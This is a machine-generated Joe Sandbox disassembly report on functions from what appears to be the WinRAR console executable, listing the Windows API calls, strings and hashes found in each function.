Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF74EEB805C

Part of subcall function 00007FF74EEBB3F0: GetSystemDirectoryW.KERNEL32(00000000,00007FF74EEB7F72), ref: 00007FF74EEBB41E

GetProcAddressForCaller.KERNELBASE ref: 00007FF74EEB7F88
GetProcAddress.KERNEL32 ref: 00007FF74EEB7FA3

Strings

CryptUnprotectMemory failed, xrefs: 00007FF74EEB8053
CryptProtectMemory, xrefs: 00007FF74EEB7F7E
Crypt32.dll, xrefs: 00007FF74EEB7F66
CryptProtectMemory failed, xrefs: 00007FF74EEB8009
CryptUnprotectMemory, xrefs: 00007FF74EEB7F95

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AddressProc$CallerCurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 1389829785-2207617598
Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction ID: 2f5a374305c8abc9711a009e4d2051d54fe4bc7334ac281fec4f434f727c74b9
Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction Fuzzy Hash: EC415921A0CAA7C4FA44FB56A840579E7A0BF49BF4F880271CD9D07B95DEBCE4468324

Function 00007FF74EECB0FC Relevance: 13.6, APIs: 9, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF74EECB110

Part of subcall function 00007FF74EECAA8C: __isa_available_init.LIBCMT ref: 00007FF74EECAAA9
Part of subcall function 00007FF74EECAA8C: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF74EECAAAE

__scrt_fastfail.LIBCMT ref: 00007FF74EECB11E

Part of subcall function 00007FF74EECB52C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF74EECB548
Part of subcall function 00007FF74EECB52C: RtlCaptureContext.KERNEL32 ref: 00007FF74EECB571
Part of subcall function 00007FF74EECB52C: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF74EECB58B
Part of subcall function 00007FF74EECB52C: RtlVirtualUnwind.KERNEL32 ref: 00007FF74EECB5CC
Part of subcall function 00007FF74EECB52C: IsDebuggerPresent.KERNEL32 ref: 00007FF74EECB620
Part of subcall function 00007FF74EECB52C: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF74EECB641
Part of subcall function 00007FF74EECB52C: UnhandledExceptionFilter.KERNEL32 ref: 00007FF74EECB64C

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF74EECB12C
__scrt_fastfail.LIBCMT ref: 00007FF74EECB143
__scrt_release_startup_lock.LIBCMT ref: 00007FF74EECB1A0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF74EECB1B6
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF74EECB1E6
__scrt_is_managed_app.LIBCMT ref: 00007FF74EECB21B
__scrt_uninitialize_crt.LIBCMT ref: 00007FF74EECB239

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
String ID:
API String ID: 552178382-0
Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction ID: 7ac5936053e459fe4a44876dbb48c1ea97f031dbaf22bc59a2f3e59d6e1b895d
Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction Fuzzy Hash: EC317C21E0C663C1FA14BB64A4117B9E391BF457A4FC40834EA5E4B2D3DFACE8848271

Function 00007FF74EEB4774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB47DB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB4831
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB4853
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF74EEB495D,?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB48A6

Strings

LanguageFolder, xrefs: 00007FF74EEB4806
Software\WinRAR\General, xrefs: 00007FF74EEB47CD

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CloseEnvironmentExpandOpenQueryStringsValue
String ID: LanguageFolder$Software\WinRAR\General
API String ID: 1800380464-3408810217
Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction ID: 00e19076188a9f5f7b7e7cd0263c3ac1b8e976ef20dbfb40c6cca85c66d9094a
Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction Fuzzy Hash: F631822261CA91C5FA50FB65E8102BAB351FF847A4F804231EE8D47B99EFACD144C710

Function 00007FF74EEA4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA43D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA4402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA443E

Strings

Software\WinRAR\Paths, xrefs: 00007FF74EEA43BC
AppData, xrefs: 00007FF74EEA43F7

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: ad30b453d5120a34fcb05d7e393039fe6ed027af02c787e5f852d2ac8f480fcb
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: 72115E22A1C752C6FA11BF66E4005A9B361FF85BA4F845135EA4E07A59DFBCD504C710

Function 00007FF74EE77A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9, xrefs: 00007FF74EE77BF3

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID: H9
API String ID: 0-2207570329
Opcode ID: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
Instruction ID: a1824f836b833cabe67a6fce719d0557a1e5d0c13ed09423cdb6f0af8a8237c5
Opcode Fuzzy Hash: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
Instruction Fuzzy Hash: E4E18962A0CAA2C5FB10FB24E048AAD67A9FF4979CF864535DE4D07785DF78A544C320

Function 00007FF74EE92574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF74EE925B0
WriteFile.KERNEL32 ref: 00007FF74EE925F9
WriteFile.KERNELBASE ref: 00007FF74EE9262E
GetLastError.KERNEL32 ref: 00007FF74EE92658
SetLastError.KERNEL32 ref: 00007FF74EE92689

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction ID: 1425492ae3d6f834ca4360e420f2f18f2aad0a7abc0fd1d715c498f1e3ce80de
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: 0351732660CA61C6FF64FB25F41437AB3A0FB49B64F840135DA4E46A91DFBCE545C620

Function 00007FF74EE91E80 Relevance: 7.6, APIs: 5, Instructions: 127
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF74EE91F4A
GetLastError.KERNEL32 ref: 00007FF74EE91F59
CreateFileW.KERNELBASE ref: 00007FF74EE91F99
GetLastError.KERNEL32 ref: 00007FF74EE91FA2
SetFileTime.KERNEL32 ref: 00007FF74EE91FF1

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction ID: 6a6a9144d78694dc2085dc2329e273d324cacda70e7abc2e9051b9ca62e9db0a
Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction Fuzzy Hash: BD412672A1C6A186FB60AB24E4047B9A6D0BB45BB8F810334DE7D07AC4DFBDD4858B10

Function 00007FF74EE86AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EE86C13

Strings

switches_%ls=, xrefs: 00007FF74EE86C03
switches=, xrefs: 00007FF74EE86B80
rar.ini, xrefs: 00007FF74EE86B37

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: swprintf
String ID: rar.ini$switches=$switches_%ls=
API String ID: 233258989-2235180025
Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction ID: 75b180fd238f5f66ea1445500835fa00523d5b1e8712fb2febc8350bbca06f21
Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction Fuzzy Hash: D5418C22A1C6A2C5FB14FB21D4511B9A3A0FB447B8FC00A35EA9D03AD6EFBCD545C320

Function 00007FF74EEA7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF74EEBB470: GetModuleHandleW.KERNEL32 ref: 00007FF74EEBB488
Part of subcall function 00007FF74EEBB470: GetProcAddress.KERNEL32 ref: 00007FF74EEBB4A0
Part of subcall function 00007FF74EEBB470: GetProcAddress.KERNEL32 ref: 00007FF74EEBB4D5

Part of subcall function 00007FF74EE87A68: setbuf.LIBCMT ref: 00007FF74EE87A7B
Part of subcall function 00007FF74EE87A68: setbuf.LIBCMT ref: 00007FF74EE87A8F

SetErrorMode.KERNELBASE ref: 00007FF74EEA7E5D
GetModuleHandleW.KERNEL32 ref: 00007FF74EEA7E65

Part of subcall function 00007FF74EEB48CC: GetVersionExW.KERNEL32(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB496A
Part of subcall function 00007FF74EEB48CC: LoadLibraryExW.KERNELBASE(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB4993

new.LIBCMT ref: 00007FF74EEA7EA8

Strings

rar.lng, xrefs: 00007FF74EEA7E7D

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
String ID: rar.lng
API String ID: 553376247-2410228151
Opcode ID: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
Instruction ID: f1139b56a86aec8a8da0fc4590344b3b8be0c368c5a341017a7c676aa707b8dd
Opcode Fuzzy Hash: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
Instruction Fuzzy Hash: E241AE21E0C6A2C5FB10FB21A8112B9E391BF41774FC85139E94E0B2D7DEADE9058770

Function 00007FF74EEA40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(?,00000800,?,00007FF74EEA4432,?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA40C4
SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EEA40DF
SHGetPathFromIDListW.SHELL32 ref: 00007FF74EEA40F1

Part of subcall function 00007FF74EE93458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF74EEA413F,?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EE934A0
Part of subcall function 00007FF74EE93458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF74EEA413F,?,?,?,?,00000800,00000000,00000000,00007FF74EEA38CB,?,?,?,00007FF74EEA41EC), ref: 00007FF74EE934D5

Strings

WinRAR, xrefs: 00007FF74EEA410F

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
String ID: WinRAR
API String ID: 977838571-3970807970
Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction ID: d393a0a23045304581f239abb124d9755747f72c4641785fc18abaf284b21419
Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction Fuzzy Hash: FC219D22A0CB52C0FA50BF26F9401BAA360BF99BE4B885035DF4E47B55DEBCD4448720

Function 00007FF74EED978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED97A5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED9807
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED9841
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF74EED3CEF,?,?,00000000,00007FF74EED3CAA,?,?,00000000,00007FF74EED3FD9), ref: 00007FF74EED986B

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
